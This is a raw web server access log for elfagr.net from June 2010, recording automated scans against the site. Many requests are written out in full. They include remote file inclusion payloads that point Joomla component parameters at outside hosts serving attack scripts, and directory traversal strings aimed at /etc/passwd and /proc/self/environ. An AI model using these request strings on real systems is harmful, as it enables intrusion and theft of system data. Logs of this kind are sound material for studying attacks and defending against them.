110.45.144.22 - - [17/Jun/2010:12:57:42 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
110.45.144.22 - - [17/Jun/2010:12:57:42 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.222.18.143 - - [17/Jun/2010:12:59:21 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
67.222.18.143 - - [17/Jun/2010:12:59:21 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
67.222.18.143 - - [17/Jun/2010:12:59:31 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
110.45.144.22 - - [17/Jun/2010:13:02:01 -0700] "GET /logs/access.log%20%20//index.php?option=com_ninjarsssyndicator&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
60.234.132.61 - - [17/Jun/2010:13:03:01 -0700] "GET /logs/access.log/web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
60.234.132.61 - - [17/Jun/2010:13:03:11 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
202.130.32.19 - - [17/Jun/2010:13:04:04 -0700] "GET /logs/xmlrpc.php HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
202.130.32.19 - - [17/Jun/2010:13:04:14 -0700] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
202.142.222.235 - - [17/Jun/2010:13:04:06 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
202.142.222.235 - - [17/Jun/2010:13:04:06 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
202.142.222.235 - - [17/Jun/2010:13:04:06 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.155.139.195 - - [17/Jun/2010:13:06:26 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
216.155.139.195 - - [17/Jun/2010:13:06:26 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
208.81.176.49 - - [17/Jun/2010:13:08:25 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
208.81.176.49 - - [17/Jun/2010:13:08:15 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
202.142.222.235 - - [17/Jun/2010:13:09:57 -0700] "GET /logs/access.log%20%20//index.php?option=com_ninjarsssyndicator&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
61.224.223.16 - - [17/Jun/2010:13:11:39 -0700] "GET /logs/access_100408.log HTTP/1.1" 200 584739 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.elfagr.net"
218.150.85.170 - - [17/Jun/2010:13:12:24 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.transkonsult.com.ar/test.pdf? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.elfagr.net"
218.150.85.170 - - [17/Jun/2010:13:12:24 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.transkonsult.com.ar/test.pdf? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.elfagr.net"
213.195.215.200 - - [17/Jun/2010:13:12:41 -0700] "GET /logs/access_100408.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.theatre-nono.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
213.195.215.200 - - [17/Jun/2010:13:12:51 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.theatre-nono.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
213.195.215.200 - - [17/Jun/2010:13:12:52 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.theatre-nono.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
94.136.38.250 - - [17/Jun/2010:13:17:09 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.136.38.250 - - [17/Jun/2010:13:17:10 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.136.38.250 - - [17/Jun/2010:13:17:20 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
60.234.132.61 - - [17/Jun/2010:13:21:37 -0700] "GET /logs/access.log/web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
60.234.132.61 - - [17/Jun/2010:13:21:29 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
60.234.132.61 - - [17/Jun/2010:13:21:42 -0700] "GET /logs/web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:22:25 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:22:56 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:22:52 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
80.67.24.223 - - [17/Jun/2010:13:23:17 -0700] "GET /logs/access.log/?option=com_rwcards/?custompluginfile[]=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
80.67.24.223 - - [17/Jun/2010:13:23:27 -0700] "GET /logs/?option=com_rwcards/?custompluginfile[]=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "elfagr.net"
80.67.24.223 - - [17/Jun/2010:13:23:17 -0700] "GET /?option=com_rwcards/?custompluginfile[]=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
216.155.139.195 - - [17/Jun/2010:13:23:35 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
213.195.215.200 - - [17/Jun/2010:13:23:29 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.theatre-nono.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
213.195.215.200 - - [17/Jun/2010:13:23:40 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.theatre-nono.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
208.81.176.49 - - [17/Jun/2010:13:24:01 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
74.63.197.215 - - [17/Jun/2010:13:25:06 -0700] "GET /logs/access.log/?option=com_rwcards/?custompluginfile[]=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.63.197.215 - - [17/Jun/2010:13:24:56 -0700] "GET /?option=com_rwcards/?custompluginfile[]=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
74.63.197.215 - - [17/Jun/2010:13:25:06 -0700] "GET /logs/?option=com_rwcards/?custompluginfile[]=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:25:26 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:25:29 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:25:29 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:25:53 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
211.174.49.102 - - [17/Jun/2010:13:25:55 -0700] "GET /logs/access.log/?option=com_rwcards/?custompluginfile[]=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
211.174.49.102 - - [17/Jun/2010:13:25:55 -0700] "GET /?option=com_rwcards/?custompluginfile[]=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
211.174.49.102 - - [17/Jun/2010:13:25:45 -0700] "GET /logs/?option=com_rwcards/?custompluginfile[]=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:26:06 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
75.125.153.66 - - [17/Jun/2010:13:27:19 -0700] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:27:28 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:27:38 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:27:29 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:27:47 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
80.67.24.223 - - [17/Jun/2010:13:27:38 -0700] "GET /logs/access.log%20%20/?option=com_rwcards/?custompluginfile[]=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:27:53 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:29:09 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:29:09 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:29:19 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:29:31 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
74.63.197.215 - - [17/Jun/2010:13:29:43 -0700] "GET /logs/access.log%20%20/?option=com_rwcards/?custompluginfile[]=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:30:28 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
216.155.139.195 - - [17/Jun/2010:13:30:22 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
216.155.139.195 - - [17/Jun/2010:13:30:22 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
216.155.139.195 - - [17/Jun/2010:13:30:23 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:30:42 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:31:15 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:31:38 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:31:43 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:32:47 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:32:38 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
94.136.38.250 - - [17/Jun/2010:13:32:43 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
208.81.176.49 - - [17/Jun/2010:13:32:53 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
208.81.176.49 - - [17/Jun/2010:13:32:44 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
208.81.176.49 - - [17/Jun/2010:13:32:44 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:32:50 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:33:19 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:33:10 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
211.174.49.102 - - [17/Jun/2010:13:33:39 -0700] "GET /logs/access.log%20%20/?option=com_rwcards/?custompluginfile[]=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:34:30 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:34:21 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:34:21 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:35:17 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:37:29 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
82.96.90.170 - - [17/Jun/2010:13:37:38 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
82.96.90.170 - - [17/Jun/2010:13:37:38 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
82.96.90.170 - - [17/Jun/2010:13:37:28 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
82.96.90.170 - - [17/Jun/2010:13:37:28 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.93.240.149 - - [17/Jun/2010:13:37:30 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.93.240.149 - - [17/Jun/2010:13:37:46 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:38:26 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:38:26 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:38:27 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:38:43 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:38:43 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:39:53 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:39:54 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:41:31 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:41:32 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
75.125.153.66 - - [17/Jun/2010:13:42:00 -0700] "GET /logs/access_091126.log//modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.elfagr.net"
75.125.153.66 - - [17/Jun/2010:13:42:10 -0700] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.elfagr.net"
75.125.153.66 - - [17/Jun/2010:13:42:01 -0700] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:42:57 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:42:57 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:43:07 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.810" "elfagr.net"
202.229.183.186 - - [17/Jun/2010:13:44:54 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.elfagr.net"
75.125.153.66 - - [17/Jun/2010:13:45:02 -0700] "GET /logs/access_091119.log//modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "www.elfagr.net"
194.201.253.2 - - [17/Jun/2010:13:45:19 -0700] "GET /logs/config.php?path_to_root=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
194.201.253.2 - - [17/Jun/2010:13:45:09 -0700] "GET /config.php?path_to_root=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
194.201.253.2 - - [17/Jun/2010:13:45:09 -0700] "GET /logs/access_100401.log/config.php?path_to_root=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
194.201.253.2 - - [17/Jun/2010:13:45:09 -0700] "GET /logs/access_100325.log/config.php?path_to_root=http://phamsight.com/docs/images/tail?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.169.249.251 - - [17/Jun/2010:13:45:53 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
211.169.249.251 - - [17/Jun/2010:13:45:53 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://dex.do.am/dex/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:46:27 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "elfagr.net"
195.12.48.49 - - [17/Jun/2010:13:46:28 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.810" "elfagr.net"
70.38.31.249 - - [17/Jun/2010:13:47:38 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:52:25 -0700] "GET /logs/access_100408.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:52:35 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:52:25 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:53:41 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
213.133.114.100 - - [17/Jun/2010:13:53:43 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:54:01 -0700] "GET /logs/access_091029.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:54:01 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:54:12 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:57:11 -0700] "GET /logs/access_100408.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
89.111.176.231 - - [17/Jun/2010:13:57:21 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
